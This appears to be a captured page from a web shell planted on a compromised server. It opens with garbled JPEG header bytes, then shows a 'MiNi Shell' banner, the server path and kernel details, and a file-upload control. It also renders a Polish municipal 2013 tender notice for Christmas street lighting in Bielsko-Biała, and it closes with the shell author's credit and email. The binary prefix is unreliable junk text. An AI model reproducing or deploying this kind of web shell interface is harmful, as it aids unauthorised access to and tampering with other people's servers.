JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131104/448372-N-2013.html

<p class="kh_header"><b>Bielsko-Biała: Wykonanie świetlnej dekoracji świątecznej ulic i placów Bielska-Białej.</b><br>
<b>Numer ogłoszenia: 448372 - 2013; data zamieszczenia: 04.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bielsko-Biała - Urząd Miejski w Bielsku-Białej , Plac Ratuszowy 1, 43-300 Bielsko-Biała, woj. śląskie, tel. 33 4971497, faks 33 4971786, 8227539.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bielsko.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.um.bielsko.pl/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie świetlnej dekoracji świątecznej ulic i placów Bielska-Białej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie świetlnej dekoracji świątecznej ulic i placów Bielska-Białej, obejmującej w szczególności:
-  wynajem elementów świetlnych od dnia 22 listopada 2013 r. do 12 lutego 2014 r.  
Elementy należy wykonać według wytycznych zawartych w załączniku nr 5 do SIWZ, stanowiącym szczegółowy opis przedmiotu zamówienia. 
Wykonawca zobowiązany jest do posiadania ubezpieczenia OC oraz odpowiedniego 
ubezpieczenia obejmującego wynajęte elementy. Zamawiający nie odpowiada za 
żadne uszkodzenia elementów, niezależnie od przyczyny ich powstania.

- wykonanie montażu elementów dekoracji świątecznej w miejscach wskazanych przez Zamawiającego z przygotowaniem do podłączenia do sieci elektrycznej, 
w  nieprzekraczalnym terminie od 22 listopada 2013 r. do 2 grudnia 2013 r.
Przed przystąpieniem do montażu elementów Wykonawca jest zobowiązany do 
dostarczenia do siedziby Zamawiającego 1 sztuki każdego wzoru, celem 
sprawdzenia zgodności z wytycznymi zawartymi w załączniku nr 5 do SIWZ.

-montaż instalacji zasilania i podłączenie elementów dekoracji do sieci elektrycznej 
w terminie od dnia 3 grudnia 2013 r. do 6 grudnia 2013 r;
-serwisowanie elementów dekoracji od dnia montażu do demontażu, obejmujące:
I.kontrolę i serwisowanie mocowań, instalacji zasilania i podłączeń do sieci elektrycznej;
II.kontrolę sprawności elementów świetlnych,
III.naprawę usterek w ciągu 12 godzin od kontroli lub zgłoszenia przez  
Zamawiającego (ze szczególnym uwzględnieniem niedziel i dni świątecznych), 
w przypadkach zagrożenia ludzi lub mienia Wykonawca ma obowiązek przystąpić
do usunięcia awarii lub usterki w ciągu 2 godzin od kontroli lub zgłoszenia przez 
Zamawiającego;

-odłączenie elementów dekoracji od sieci elektrycznej i demontaż instalacji zasilania 
w terminie od dnia 31 stycznia 2014 r. do 5 lutego 2014 r. - w kolejności i terminach ustalonych z Zamawiającym;

 - demontaż elementów dekoracji świątecznej po okresie wynajmu - w terminie
5 lutego 2014 r. do 12 lutego 2014 r.
Montaż elementów i podłączeń do instalacji oświetlenia ulicznego musi być wykonywany przy spełnieniu następujących warunków:

-należy uzyskać zgodę Miejskiego Zarządu Dróg z siedzibą przy ulicy Grażyńskiego 10w Bielsku-Białej na zajęcie pasa drogowego w czasie prowadzenia wszelkich prac, związanych z montażem, serwisowaniem i demontażem elementów dekoracji, instalacji zasilania i podłączeń;
-należy uzgodnić z Miejskim Zarządem Dróg w Bielsku-Białej minimalną wysokość, na jakiej mają  zostać powieszone iluminacje świąteczne  w poszczególnych miejscach;
- na dwa tygodnie przed przystąpieniem do montażu należy harmonogram wykonywania prac wraz z wykazem ulic;
- przewody zasilające iluminację oraz wnęki słupowe powinny być zabezpieczone   
przed dostępem osób postronnych;
- montaż iluminacji na słupach kompozytowych tylko przy zastosowaniu podnośnika 
hydraulicznego;
- na słupach stalowych i kompozytowych - montaż iluminacji przy zastosowaniu
 podkładek z tworzywa pod obejmy stalowe;
-zakaz naruszania konstrukcji słupów (poprzez wiercenie itp.)
-w przypadku przepalenia się wkładki bezpiecznikowej w słupie oświetleniowym w 
wyniku zamontowania iluminacji, wymagana jest wymiana uszkodzonego
elementu przez Wykonawcę,

2.Przedmiot zamówienia opisany jest szczegółowo w załączniku nr 5 do siwz, stanowiących integralną część nin. Specyfikacji.
4.Z uwagi na specyfikę przedmiotu zamówienia, przetarg podzielono na 24 części:
Część  I:	Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul. Wzgórze.
Część  II:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul. Stojałowskiego.
Część  III:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do  dekoracji ul. 11 Listopada (wraz z ul. Komorowicką).
Część   IV:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul. Warszawskiej - odcinek od Ronda Solidarności do skrzyżowania przed Dworcem PKP.
Część   V: Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul. 3 Maja.
Część   VI:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul Zamkowej.
Część   VII:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji skrzyżowania ul. Partyzantów i Al. Gen. Andersa.
Część VIII:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji Placu Wojska Polskiego.
Część IX:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul. Przechód Schodowy.
Część   X:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul. Partyzantów - odcinek od ul. Sikorskiego do ul. Michałowicza.
Część   XI:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji skrzyżowania ul. Partyzantów z ul. Michałowicza.
Część   XII:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ul. Partyzantów - odcinek od ul. Michałowicza do Al. Gen. Andersa.
Część   XIII:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji skrzyżowania ul. Żywieckiej z ulicą Bora Komorowskiego.
Cześć XIV:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych 
do dekoracji ul. Słowackiego - na odcinku od ul. Piastowskiej do ul. Sixta.
Część XV:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych  do dekoracji skrzyżowania Al. Gen. Andersa i ul. Gen Sosnkowskiego.
Część XVI:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych 
do dekoracji Placu Ratuszowego.
Część XVII:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych 
do dekoracji Placu Smolki - rejon pomnika Reksia.
Część XVIII: Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych do dekoracji Placu Wolności.
Część XIX: Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych do dekoracji ulicy Piastowskiej - skrzyżowania z ulicami: Słowackiego, Wyspiańskiego i Sobieskiego.
Część XX: Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji Ronda Hulanka.
Część XXI: Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji ulicy Barlickiego.
Część  XXII:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do  dekoracji 2 drzew rosnących przy ulicy 11 Listopada i Placu Ratuszowym oraz elementów przeznaczonych do dekoracji alei spacerowej za gmachem Ratusza Miejskiego.
Część  XXIII:Wynajem, montaż, serwisowanie i demontaż elementów przeznaczonych
do dekoracji centrum dzielnic: Komorowice Krakowskie i Kamienica.
Część XXIV:  Wynajem, montaż, serwisowanie i demontaż rzutników przeznaczonych do iluminacji dekoracyjnej ściany budynku w rejonie Placu Chrobrego w Bielsku-Białej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 51.11.00.00-6, 39.29.89.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 22.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 1 usługi polegającej na dekorowaniu ulic i placów w okresie Świąt Bożego Narodzenia o wartości:
- min. 5 000,00 zł brutto - w przypadku składania oferty na dowolną ilość części z następującej grupy części zamówienia : I, VI, VIII, IX, X, XIV, XV, XVI, XVIII, XXIII;
- min. 15 000,00 zł brutto - w przypadku składania oferty na dowolną ilość części z  następującej grupy części zamówienia: III, VII, XI, XIII, XVII, XIX, XX, XXI, XXIV;
- min. 30 000,00 zł brutto - w przypadku składania oferty na dowolną ilość części z  następującej grupy części zamówienia: II, IV, V, XII, XXII.

Sposób dokonywania oceny spełnienia warunku: na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca winien wykazać się należytym wykonaniem co najmniej jednej usługi polegającej na dekorowaniu ulic i placów w okresie Świąt Bożego Narodzenia o wartości:
- min. 5 000,00 zł brutto - w przypadku składania oferty na dowolną ilość części z następującej grupy części zamówienia : I, VI, VIII, IX, X, XIV, XV, XVI, XVIII, XXIII;
- min. 15 000,00 zł brutto - w przypadku składania oferty na dowolną ilość części z  następującej grupy części zamówienia: III, VII, XI, XIII, XVII, XIX, XX, XXI, XXIV;
- min. 30 000,00 zł brutto - w przypadku składania oferty na dowolną ilość części z  następującej grupy części zamówienia: II, IV, V, XII, XXII.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, 
w celu udowodnienia, iż Wykonawca będzie dysponował zasobami niezbędnymi
do realizacji zamówienia - w przypadku gdy Wykonawca wskaże, że będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (art. 26 ust. 2b ustawy Pzp);
2.Oświadczenie Wykonawcy (na formularzu Oferta)
-o zdobyciu informacji koniecznych do sporządzenia oferty;
-o zapoznaniu się z warunkami przetargu zawartymi w specyfikacji istotnych warunków zamówienia wraz z załącznikami i przyjęciu tych warunków bez zastrzeżeń oraz zobowiązaniu się do zawarcia umowy na warunkach określonych we wzorze umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w następujących przypadkach:
a)co do terminu zakończenia zamówienia, który może być przedłużony wskutek:
a.wystąpienia zdarzeń siły wyższej;
b.wstrzymania prac przez Zamawiającego albo przerw w wykonywaniu prac   powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający;
b)co do wynagrodzenia może nastąpić w przypadku:
a.odstąpienia (rezygnacji) od części zamówienia;
c)co do istotnych postanowień umowy, z ważnych powodów, a w szczególności
o ile jest ona konieczna i wynika z okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> um.bielsko.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Wydział Gospodarki Miejskiej w Bielsku-Białej, Plac Ratuszowy 7 - parter, pok. nr 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2013 godzina 09:00, miejsce: w sekretariacie Wydziału Gospodarki Miejskiej Urzędu Miejskiego w Bielsku-Białej, Plac Ratuszowy 7, parter, pok. nr 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com